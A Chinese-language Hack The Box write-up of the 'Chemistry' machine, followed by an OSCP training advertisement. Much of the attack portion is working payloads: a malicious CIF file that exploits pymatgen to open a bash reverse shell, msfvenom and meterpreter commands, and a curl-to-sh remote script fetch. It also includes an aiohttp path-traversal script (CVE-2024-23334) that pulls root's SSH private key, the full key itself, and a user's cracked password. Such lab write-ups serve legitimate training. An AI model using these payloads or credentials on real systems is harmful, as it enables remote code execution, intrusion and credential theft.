【htb】Chemistry(化学)-靶机渗透

admin 2025年3月26日09:37:00评论8 views字数 6286阅读20分57秒阅读模式

通过信息收集访问5000端口,cif历史cve漏洞反弹shell,获取数据库,利用低权限用户登录,监听端口,开放8080端口,aihttp服务漏洞文件包含,获取root密码hash值,ssh指定登录

靶机信息

【htb】Chemistry(化学)-靶机渗透

最终目标

【htb】Chemistry(化学)-靶机渗透

一、信息收集

nmap扫描,开放了22和5000端口

Werkzeug/3.0.3 Python/3.9.5
OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
【htb】Chemistry(化学)-靶机渗透

访问5000端口,是一个CIF仪器面板

# CIF(Crystallographic Information File)是一种用于描述晶体结构的文件格式。它广泛应用于化学、材料科学和固体物理等领域,特别是在晶体学研究中。CIF文件包含了关于晶体的详细信息,包括原子位置、晶格参数、对称性、空间群等。
【htb】Chemistry(化学)-靶机渗透

登录尝试弱口令无果,随便注册一个账户登录,发现一处示例

【htb】Chemistry(化学)-靶机渗透

下载下来查看一下

【htb】Chemistry(化学)-靶机渗透

尝试搜索组件漏洞信息

【htb】Chemistry(化学)-靶机渗透

查找到cif漏洞

【htb】Chemistry(化学)-靶机渗透

发现可以利用命令执行反弹shell

【htb】Chemistry(化学)-靶机渗透

二、获取shell

这里先看一下我们kali挂完代理的ip,这个地方我自己犯了一个致命错误,因为是第一次打htb靶机,忽略了kali挂代理ip会变,使用的是本机的ip进行反弹shell,导致一直反弹不成功

【htb】Chemistry(化学)-靶机渗透

命令执行反弹shell

修改脚本反弹shell到kali

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.20/4444 0>&1'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

上传该文件

【htb】Chemistry(化学)-靶机渗透

点击View,成功获取反弹shell

【htb】Chemistry(化学)-靶机渗透

msfconsole获取shell

执行以下命令,使用两个命令面板

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.10.16.20 lport=4444 -f elf>aa.elf
python3 -m http.server 80

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 10.10.16.20 #kali的ip
set lport 4444
run

远程下载执行脚本提权

先把反弹shell脚本写入到sh文件,然后上传web

echo -ne '#!/bin/bashn/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.20/4444 0>&1"' > shell.sh
sudo python3 -m http.server 80

新建cif文件,然后写入以下命令,利用curl下载命令下载脚本,然后执行

data_5yOhtAoR
_audit_creation_date           2018-06-08
_audit_creation_method         "Pymatgen CIF Parser Arbitrary Code Execution 
Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in 
().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + 
"classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system 
("curl http://10.10.16.20/shell.sh|sh");0,0,0'

_space_group_magn.number_BNS 62.448

三、提权

先基础查找信息

【htb】Chemistry(化学)-靶机渗透

查看suid信息,没什么可利用的

【htb】Chemistry(化学)-靶机渗透

查看**/etc/passwd看看有没有什么泄露的,发现一个可以执行bash的用户rosa**

【htb】Chemistry(化学)-靶机渗透

查看文件系统,没有什么可以利用的

【htb】Chemistry(化学)-靶机渗透

进入该目录查看,发现一处数据库信息

【htb】Chemistry(化学)-靶机渗透

使用sqlite3查看,然后查看user表的所有列,得到的所有用户名和密码hash值,注意这个rosa用户的密码63ed86ee9f624c7b14f1d4f43dc251a5

【htb】Chemistry(化学)-靶机渗透

解密一下,得到密码:unicorniosrosados

【htb】Chemistry(化学)-靶机渗透

这里我直接切换用户不成功,就ssh连接了,不过连接后可能会有些延迟

【htb】Chemistry(化学)-靶机渗透

查看当前目录,发现第一个flag

【htb】Chemistry(化学)-靶机渗透

列出当前系统上所有处于监听状态(LISTEN)的网络端口,有一个本地服务

【htb】Chemistry(化学)-靶机渗透

了解一下http-alt

# 替代端口:在某些网络环境中,可能会使用非标准端口(如8080、8000等)来运行HTTP服务。这些端口被称为“替代端口”,可以用于绕过防火墙限制或进行特定的网络配置。
# 代理服务器:在某些情况下,HTTP-ALT可能涉及到通过代理服务器进行HTTP请求,这些代理可能会监听不同的端口。
# 应用程序和服务:某些应用程序或服务可能会在非标准端口上提供HTTP接口,这些接口也可以被称为HTTP-ALT。

把网页内容下载下来,看到服务信息

【htb】Chemistry(化学)-靶机渗透

搜索历史漏洞,找到一个exp:https://github.com/z3rObyte/CVE-2024-23334-PoC

【htb】Chemistry(化学)-靶机渗透

修改poc

#!/bin/bash

url="http://localhost:8080"#目标url
string="../"
payload="/assets/"#路径
file="root/.ssh/id_rsa"# 查看hash值 /

for ((i=0; i<15; i++)); do
    payload+="$string"
echo"[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}""$url$payload$file")
echo -e "tStatus code --> $status_code"

if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
break
fi
done

执行该脚本,可以执行

【htb】Chemistry(化学)-靶机渗透

开启web服务

【htb】Chemistry(化学)-靶机渗透

wget下载,然后赋予权限执行,拿到root密码hash值

【htb】Chemistry(化学)-靶机渗透

如下,一定要完整保存

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

新建文件存放key,赋予只可管理员读写权限

【htb】Chemistry(化学)-靶机渗透

ssh使用key连接

【htb】Chemistry(化学)-靶机渗透

成功连接,发现flag文件

【htb】Chemistry(化学)-靶机渗透

结束

【htb】Chemistry(化学)-靶机渗透

四、总结

知识点

  • msfconsole获取shell:
  • 远程下载文件执行获取shell:
  • sqlite3:  用于操作 SQLite 数据库的命令行工具 ,可以执行mysql命令
  • netstat -l:  列出当前系统上所有处于监听状态(LISTEN)的网络端口
  • http-alt: 非标准端口,如8080

任务1-4

【htb】Chemistry(化学)-靶机渗透

任务5-8

【htb】Chemistry(化学)-靶机渗透

任务9-12

【htb】Chemistry(化学)-靶机渗透

end

oscp

有对红队工作感兴趣,或者有意报考oscp的师傅,可以考虑一下我们的培训课程,加我微信咨询,好处如下:

1.报考后课程随时可看,并且如果对考试没有信心,还可以留群跟第二批课程学习,不限次数时间,报考即是一辈子可看

2.200+台靶机及官方课程,lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍,并且群内随时答疑,团队老师及群友都会积极解答,全天可答疑

3.目前可接受分期付款,无利息,最多分四个月,第一次付完即可观看视频

4.加入课程可享受工作推荐机会,优秀者可内推至红队

5.报考即送送官方文档中文版,以及kali命令详解中文版,纯人工翻译,版权为团队所有

【htb】Chemistry(化学)-靶机渗透

资料:

【htb】Chemistry(化学)-靶机渗透

知识星球

还可以加入我们的知识星球,包含cs二开,甲壳虫,网恋避险工具,红盟工具等,还有很多src挖掘资料包

【htb】Chemistry(化学)-靶机渗透
【htb】Chemistry(化学)-靶机渗透
【htb】Chemistry(化学)-靶机渗透

学习交流群

公众号后台这里选择学习交流即可,如果图片二维码过期,可以加我微信获取

【htb】Chemistry(化学)-靶机渗透

原文始发于微信公众号(泷羽Sec-track):【htb】Chemistry(化学)-靶机渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月26日09:37:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【htb】Chemistry(化学)-靶机渗透https://cn-sec.com/archives/3885121.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息